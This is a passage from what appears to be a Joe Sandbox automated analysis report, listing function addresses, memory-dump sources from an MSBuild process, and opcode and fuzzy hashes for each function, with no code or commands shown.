                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5129908f0b0b88e96a0dc877cd033a5497a041c5d7397c4bf25d6e8bfa06fed7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FD01275700000CF8758DB58E4005DD77A5EFC462570104E5F206C7661CB219C558B90
                                                                                                                                                                                                                                                Function 071B83FB Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f62f6d1c27637a1e0ea453e02225ea1e3ab6aecdf2e534d4a13894cdbfc83667
                                                                                                                                                                                                                                                • Instruction ID: 47ed336711a9ed3ebf8f19a2b9fa1a38fc142aaf00db3976e0cc92fbae97d580
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f62f6d1c27637a1e0ea453e02225ea1e3ab6aecdf2e534d4a13894cdbfc83667
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DC012B5710008CFC704D75CF4045EC37A5DB8552570000A9D306CB261DB219C154F90
                                                                                                                                                                                                                                                Function 071B83F2 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dfd970979b8ac0d7de91f5132d173a96eacc85d8c19a412d7a13cc2829ba9cc1
                                                                                                                                                                                                                                                • Instruction ID: 1c451dd19f1b7c06d4ef6f1b6d5a06354d232503faaad8b515a15ea0795bac6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfd970979b8ac0d7de91f5132d173a96eacc85d8c19a412d7a13cc2829ba9cc1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76C08035B50014CFCB14C748E8045E87775FB89719B0500A2D606C7260D725E8158F81
                                                                                                                                                                                                                                                Function 071B80AC Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ce726cd648f223a84a2fcf535e89e922855401925c1c24bbc57019bbfc2b9bd0
                                                                                                                                                                                                                                                • Instruction ID: 35b85f4b446835f672d56665ff1222ccf71313e7c14f8bfe91db20bb8239d03d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce726cd648f223a84a2fcf535e89e922855401925c1c24bbc57019bbfc2b9bd0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76D012757400009FCB08DB98E4005E833B5DFC5625B0100A5E206CBA71CB319C958BD1
                                                                                                                                                                                                                                                Function 07097F5F Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dc7667cddef0e10d423ccda8594c337257ef78961d9f670b91162c2a79c416cf
                                                                                                                                                                                                                                                • Instruction ID: 0e43e0d175cf7f6fef705934586add2212f912ef1b12b195a4f94ca64e5cf974
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc7667cddef0e10d423ccda8594c337257ef78961d9f670b91162c2a79c416cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7D0C96115C3D56FE7029361A4503817B24EF47390F1987CBD1848B5A3E6189986C765
                                                                                                                                                                                                                                                Function 07096850 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ff79fb942d2f49bdf5b4ab83b4416355b1951bd883ee39749cd5ff6f8b72f40
                                                                                                                                                                                                                                                • Instruction ID: 270e084413619ab67f7ed226dc795c70305d42f4e112355a148a7fa316541fa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ff79fb942d2f49bdf5b4ab83b4416355b1951bd883ee39749cd5ff6f8b72f40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1D01271D0E34CAFD315DBA99815415FF7CEF0B200B0442DAED888B266E579985087E2
                                                                                                                                                                                                                                                Function 072AF4A3 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 73fdba7248d951d8858ffcfa11ec04272a31cbf71bc3fd616cff33dcbbf929e2
                                                                                                                                                                                                                                                • Instruction ID: 41bcebcf99d2b3496db625269ad64746ab3473b69b729ad5852861c5f33bcd01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73fdba7248d951d8858ffcfa11ec04272a31cbf71bc3fd616cff33dcbbf929e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D0C7919193E14FC7076B7574280B53F60BB7220271606C7D4808B553C62C4B05D751
                                                                                                                                                                                                                                                Function 0709C850 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9acd6e1189c73de43a60e0edc7b976b28bc08ded5eece904b1d9a093252d6217
                                                                                                                                                                                                                                                • Instruction ID: 5b87ee453fc185a47cef105f6245c62a82caba22f8c0c3b80d3fb7241fd9bb13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9acd6e1189c73de43a60e0edc7b976b28bc08ded5eece904b1d9a093252d6217
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71D012E361D3C0BFC3068324C8945847FA1DF62304F3A4992C240C2153D36454158715
                                                                                                                                                                                                                                                Function 072A6D09 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f938e98d9af6bbc038d2d4c22ca207bd8101ee276ec10f94adc08166aa2ebd77
                                                                                                                                                                                                                                                • Instruction ID: a406ab061cc5454a736943cf551f8d159d9c8b54312dc27152ad57ffe7017ed5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f938e98d9af6bbc038d2d4c22ca207bd8101ee276ec10f94adc08166aa2ebd77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0B092BF2055046EEA1486907F07AE6BF14AB64721F018106E20800C4149A700D4AAF6
                                                                                                                                                                                                                                                Function 070984C0 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 752608570d57b940a830051cfe838cc7aa0a3f6800bcd9836c6cb4ca256ec736
                                                                                                                                                                                                                                                • Instruction ID: c2f870033c9320ca29d11c12a32b15d1104ca85fe2823c61a217cd0558c1c843
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 752608570d57b940a830051cfe838cc7aa0a3f6800bcd9836c6cb4ca256ec736
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08C08CF82003006FE3048B60CD44A27BBE3EFD8701F11C418620086668CE748810CF99
                                                                                                                                                                                                                                                Function 07096860 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c464500ae127ac3909713bbca6ebf9e859f883102d8a6800ca9229e43ee7dc96
                                                                                                                                                                                                                                                • Instruction ID: 5840e06b07ad46bdcee4354a8636c6ede89fe4f11f2233b4fa519d71a9cbcfed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c464500ae127ac3909713bbca6ebf9e859f883102d8a6800ca9229e43ee7dc96
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61B0927090530CAF8624DA99980195AB7ACDA0A210B0001D9E90887320D976A91057D1
                                                                                                                                                                                                                                                Function 07097F98 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 362397caefa559bb2f131a622e636d9519408af6c182440eb10f410250a9633c
                                                                                                                                                                                                                                                • Instruction ID: 74e3be7ce10aacb1b108d1a9cc19e775b27eb2ca25abe5cab134663dc05bcec6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 362397caefa559bb2f131a622e636d9519408af6c182440eb10f410250a9633c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5B0127004570E5BC540FB71F44954433ECBB80628B404320B00C051065B6C68018A8D
                                                                                                                                                                                                                                                Function 072AAC90 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                                                                                                                                                                                                                • Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40
                                                                                                                                                                                                                                                Function 072AAAF0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 071606f9ac93cf8249539b6597799d487efc42b6685d35dff925687fe447caac
                                                                                                                                                                                                                                                • Instruction ID: 8a77fed616b47a4429056de24ea6752656ed7f869c61f96983e84a7b1b2b211a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 071606f9ac93cf8249539b6597799d487efc42b6685d35dff925687fe447caac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74B092341506088F82009B58E448C4473E8AB08A253114090E1088B232C621FC408A40
                                                                                                                                                                                                                                                Function 072A6948 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2e34e91cf1970ffb7faa171d907a2795e440836c17e199d96d27be1a9031492c
                                                                                                                                                                                                                                                • Instruction ID: 51d1fd009c7494b3795dd46c13464551c024d1c00e1075a38f9eec9aa05e5e5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e34e91cf1970ffb7faa171d907a2795e440836c17e199d96d27be1a9031492c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79B0127100470D4FDA00FB61F4466C4379D9740724B504310A00C0A0165B6978444A8A
                                                                                                                                                                                                                                                Function 071B8B18 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f88b9e74fa08884093fd294961891911ff4a96a5f4eaa4450ad54e5493d27fe2
                                                                                                                                                                                                                                                • Instruction ID: bded677c3281eda911da205fb5cf1301bb8ae033d72876567a6892e8d8fe1599
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f88b9e74fa08884093fd294961891911ff4a96a5f4eaa4450ad54e5493d27fe2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AC09230501240DFCB06CF24C0488007B73AF4230935940DCD00A8B522CB32EDC2CF00